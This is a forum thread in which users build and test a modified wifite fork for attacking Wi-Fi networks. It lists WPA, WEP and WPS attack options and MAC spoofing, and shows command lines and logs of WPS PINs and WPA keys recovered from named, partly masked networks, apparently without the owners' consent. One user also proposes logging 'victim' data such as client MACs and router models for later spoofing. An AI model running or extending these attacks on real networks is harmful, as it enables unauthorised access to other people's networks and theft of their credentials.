  --wpat [secs]         Time to wait for WPA attack to complete (seconds).
  --nowpa               Disable WPA handshake attack.
  --wpadt [secs]        Time to wait between sending deauth packets (seconds).
  --strip               Strip handshake using tshark or pyrit.
  --crack CRACK         Crack WPA handshakes using dict/hash file. (0 =
                        disable , 1 = aircrack, 2 = pyrit, 3 = cowpatty)
  --dict [file]         Specify dictionary to be used when cracking WPA.
  --hash [file]         Specify precomputed hash to be used when cracking WPA.
  --recapture           Recapture handshake even if the cap file exists.
  --aircrack            Verify handshake using aircrack.
  --pyrit               Verify handshake using pyrit.
  --tshark              Verify handshake using tshark.
  --cowpatty            Verify handshake using cowpatty.

WEP:
  --wep                 Only show WEP networks in scanning state (equivalent
                        to "--show wep").
  --pps [N]             Set the number of packets per second to inject.
  --wept [secs]         Max time for each attack, 0 implies endless.
  --chopchop            Use chopchop attack.
  --arpreplay           Use arpreplay attack.
  --fragment            Use fragmentation attack.
  --caffelatte          Use caffe-latte attack.
  --p0841               Use P0842 attack.
  --hirte               Use hirte attack.
  --nofakeauth          Stop attack if fake authentication fails.
  --wepca [N]           Start cracking when number of IVs surpass [n].
  --wepnosave           Dont save the captured IVs to "wep" folder in current
                        working directory.
  --wepsaveiv           Save the captured IVs in form of .ivs to "wep" folder
                        in current working directory. (.ivs is smaller than
                        .cap but NOT compatible with old aircrack-ng)

WPS:
  --wps                 Only show WPS networks in scanning state (equivalent
                        to "--show wps --nowpa").
  --nowps               Disable WPS PIN Attack.
  --wpst [secs]         Max wait for new retry before giving up (0: never).
  --wpsratio [ratio]    Min ratio of successful PIN attempts/total retries.
  --wpsretry [N]        Max number of retries for same PIN before giving up.
  --wpssave             Save progress of WPS PIN attack to "wps" subfolder in
                        current folder.

OTHERS:
  --update              Check and update Wifite.
  --debug               Print lots of debug information.

Some cool featuers:
--update Check and update Wifite.
--mac Anonymize MAC address.
--wpsretry [N] Max number of retries for same PIN before giving up.
--wpssave Save progress of WPS PIN attack to "wps" subfolder in
current folder.
--debug Print lots of debug information
Lots for filters

[nuroo]

What behavior were you thinking for the spoofing part?


Specify address to spoof at command line?
Wait until client found then start attack with spoofed address?
Start attacking unspoofed and watch at same time, and when client found, restart attack with spoofed address?
If multiple clients found, rotate addresses so often?

For now
wifite -mac
Check mon0 is actually spoofed or random. airmon-ng doesn't carry spoofed mac to monitor. macchanger needs to also be carried out on mon0.
macchanger on wlan only, not sufficient.
also
reaver use --mac option, spoofed/random mac
aireplay-ng use -h option spoofed/random mac

Down the road:
wifite -clients (only attack access points with connected clients, spoof client b4 any attacks)

any deauths use connected clients mac

[nuroo]

I just saw you added -mac to wifite....... I like....Cheers. Worked great.

Back to testing

[nuroo]

./wifitemod -mac -ponly -pixiet 70

[+] 25 attacks completed:

[+] 3/25 WPA attacks succeeded
found Tomm000000 WPA key: "char00000", WPS PIN: 3700000

found Wile000000 WPA key: "Steph00000", WPS PIN: 12080000
./wifitemod -mac -ponly -pixiet 70
found DG1600000 WPA key: "DG167000000", WPS PIN: 7670000


[+] disabling monitor mode on mon0... done
[+] changing wlan1's mac back to 00000000:20:5b... done
[+] quitting

Nice !!!

[aanarchyy]

Well, it's got a live timer(count up), not as pretty, but functional.
Trying to fix some of the other stuff that was in the origional code, but more interested in the pixiewps/wps part of this to be honest.

[nuroo]

Ok cool. Pixiewps and wepcrack are first methods used anyway. Low hanging fruit so to speak. Quick and dirty, first. Routers that take longer saved for last.

I only started beta testing WPA capture part of the script because u fixed all the pixie section errors found to date.

Glad u implementated timer for pixiewps attack. Will try it soon.

[nuroo]

-pixiet <secs>

sets a max time for pixiewps attack.
I have been using 90 secs. If access point doesn't bite at all in 90 secs im pretty much convinced its not gonna bite at all. script moves on to next target. if I want I could set a higher time later maybe 180 secs.

What I have been running into though are cases were the access point partially bites in the set time frame.

Code:

[0:00:00] initializing PixieWPS attack on Lu0000000 (00000003:5C)
 [+] E-Nonce found
 [+] PKE hash found
 [+] PKR hash found
 [+] Authkey found

 [!] unable to complete in 90 seconds
 [+] skipping pixiewps on Luc0000000

I'm thinking the script can
wait another 60 secs to try and catch rest of info
or
prompt user if he wants to wait another 60 secs or so. if no response in 20secs, automatically move next target.

[nuroo]

nvm
doesn't seem to be time related. When I run attacks in command line against those same access points, some pixie cracks right away, others timeout, other are locked, or fail to associate.

could be mac filtering, I know some had vulnerable chipsets

[aanarchyy]

Added updater
just run ./wifite -update
downloads and replaces itself with latest revision automatically

Fixed timer, should look much better now

Fixed issue with new airmon-ng not creating monitor interface.

I'm thinking the script can
wait another 60 secs to try and catch rest of info
or
prompt user if he waits to wait another 60 secs or so. if no response in 20secs, automatically move next target.

That's actually a pretty good idea, maybe add 30 seconds to the countout on each hash found.

EDIT: BLAH! just noticed the interface part is still a little screwed up, ill get to fixing it later tonight.

[nuroo]

Timer success,
Guess im impatient and want to know script is working as opposed to stuck.Two quick test with pixie attack, timer was good.

-update also worked as advertised,

[nuroo]

Added updater
just run ./wifite -update
downloads and replaces itself with latest revision automatically

Fixed timer, should look much better now

Fixed issue with new airmon-ng not creating monitor interface.



That's actually a pretty good idea, maybe add 30 seconds to the countout on each hash found.

EDIT: BLAH! just noticed the interface part is still a little screwed up, ill get to fixing it later tonight.

If you want add it. ill test it...may help in certain cases

[aanarchyy]

If you want add it. ill test it...may help in certain cases

May make it a setting with a default value and set to 0 to disable.

PS. Added you to the credits, you have been invaluable with your testing my code and some really great ideas

[nuroo]

My pleasure, thanks for the acknowledgement.

Ideas easy, coding is harder

-cracked+

outputs more data about victims from attack:
Passphrase
Pin
Clients mac's
Manufacturer
Model
Channel
Highest signal strength

Just so this info is available for later. For spoofing etc or known router vulnerabilities etc............output to text file
****************

-pixieR -P <bssid> <X>

loop for 5 to X loops on target, without passing WPS protocol to or past the M4 message to hopefully avoid lockouts

Code:

For those wondering what reavers -P option is intended for:

Option (-P) in reaver puts reaver into a loop mode that does not do the  WPS protocol to or past the M4 message to hopefully avoid lockouts. This  is to ONLY be used for PixieHash collecting to use with pixiewps, NOT  to 'online' bruteforce pins.
This option was made with intent of:

----Collecting repetitive hashes for further comparison and or analysis / discovery of new vulnerable chipsets , routers etc..

----Time sensistive attacks where the hash collecting continues repetitively until your time frame is met.

----For scripting purposes of whom want to use a possible lockout preventable way of PixieHash gathering for your Use case. 
datahead

output to text file for analysis.

[nuroo]

Works with new airmon-ng monitor naming......confirmed

[Quest]

Hi aanarchyy!

What is your wifite base for this improvement, r85 or r86?

[aanarchyy]

Hi aanarchyy!

What is your wifite base for this improvement, r85 or r86?

AFAIK, r85, whichever one is default installed in kali liveboot cd.

To be honest, i never really planned on making this a project, I was going to make a few minor modifications to a pre-existing tool, like i do to many tools to more fit my needs( as i have done with wifite a while ago along with a few other tools, aircrack, reaver, snort, dsniff stuff, etc), and was never planning on releasing anything, especially since i dont really know python.

But as of recently, ive been having a really good time playing with this, very good learning oportunity. And once it worked kinda the way i wanted, i figured i would share it with anyone that might find it useful. Never expected for this to be a "main project" for me, but i am very much enjoying this.

Had i known this was actually going to be even mildly popular, i would have used a more up-to-date version(like the derv82 version), which i still may do, but i'm going to finish adding in things before i move it to a different revision cuz patching a new revision isn't exactly going to be a copy/paste kinda thing.

But either way, im gonna keep doing what im doing, cuz im having a lot of fun with this

[Quest]

I was asking because I'm a fan of wifite and according to that ticket https://bugs.kali.org/view.php?id=2225 there seems to be improvement with r86, so naturally I thought that any further improvement should be based on that version. Thank you and keep up the good work!

[aanarchyy]

I am a HUGE fan of wifite, which is why ive chosen it to add pixiewps to.
If the devs of wifite want/ask me to be a contributor, i would be more than happy.
If not, im perfectly fine creating my own fork that works the way i want it to.

[aanarchyy]

UPDATES!

fixed -mac not really anonymizing mac address
added -endless flag to loop through targets untill stopped
make cracked.txt human readable
fixed issue with -paddto not working

May be more, but i can't remember right now.

[nuroo]

Code:

./wifite -mac -ponly -pto 45 -paddto 30 -showb
 
  --- --------------------  -----------------  --  ----  -----  ----  ------
    1  NE00000             00000000:DE:D7   6  WPA2  28db   wps 
    2  TG000000            00000000:FB:00   6  WPA2  27db   wps 
    3  DG000000            00000000:D5:F0  11  WPA2  26db   wps   client

[0:00:00] initializing PixieWPS attack on DG0000000 (000000000:D5:F0)
 [+] E-Nonce found            
 [+] PKE hash found            
 [+] PKR hash found            
 [+] Authkey found            
 [+] E-Hash1 found            
 [+] E-Hash2 found            
 [+] Cracking using pixiewps...

 [+] PIN found:     10896785
 [+] Handing pin to reaver

 [0:00:00] initializing WPS PIN attack on DG00000 (0000000:D5:F0)
^C0:02:59] WPS attack, 0/2 success/ttl,  
 (^C) WPS brute-force attack interrupted

 [+] 2 attacks completed:

 [+] 0/2 WPA attacks succeeded

 [+] quitting

Still testing, with -mac option

found:

after exiting wps pin attack from pixie attack - mon0 left alive, mac remains spoofed

Also for troubleshooting purpose's could you echo to the screen the 2nd reaver command used to find pin, and results from access point during the attack

Actually could u echo both reaver commands to screen during attack.
whole initial attack command string used by script
whole 2nd command string used to obtain pin